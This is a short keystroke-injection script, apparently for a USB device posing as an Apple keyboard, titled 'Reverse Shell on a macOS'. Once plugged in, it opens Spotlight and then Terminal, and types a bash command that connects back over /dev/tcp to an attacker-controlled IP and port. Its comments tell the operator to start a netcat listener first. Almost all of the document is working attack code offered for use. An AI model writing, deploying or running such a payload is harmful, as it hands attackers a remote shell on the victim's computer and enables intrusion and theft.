ID 05ac:021e Apple:Keyboard

REM Title: Reverse Shell on a macOS
REM Author: Gallier
REM Description: first Reverse Shell as a test
REM Target: macOS
REM Props: Gallier
REM Version: 1.0
REM Category: Reverse Shell

REM ----------------------------------
REM | First start a Netcat listener  |
REM | on the akkacker Computer!      |
REM | Example                        |
REM | $nc -nlvp 4444                 |
REM ----------------------------------

DELAY 1000
GUI SPACE

DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000

REM ----------------------------------
REM | Change IP and Port as you need |
REM ----------------------------------

STRING bash -i >&/dev/tcp/10.10.10.10/4444 0>&1
DELAY 1000
ENTER
DELAY 1000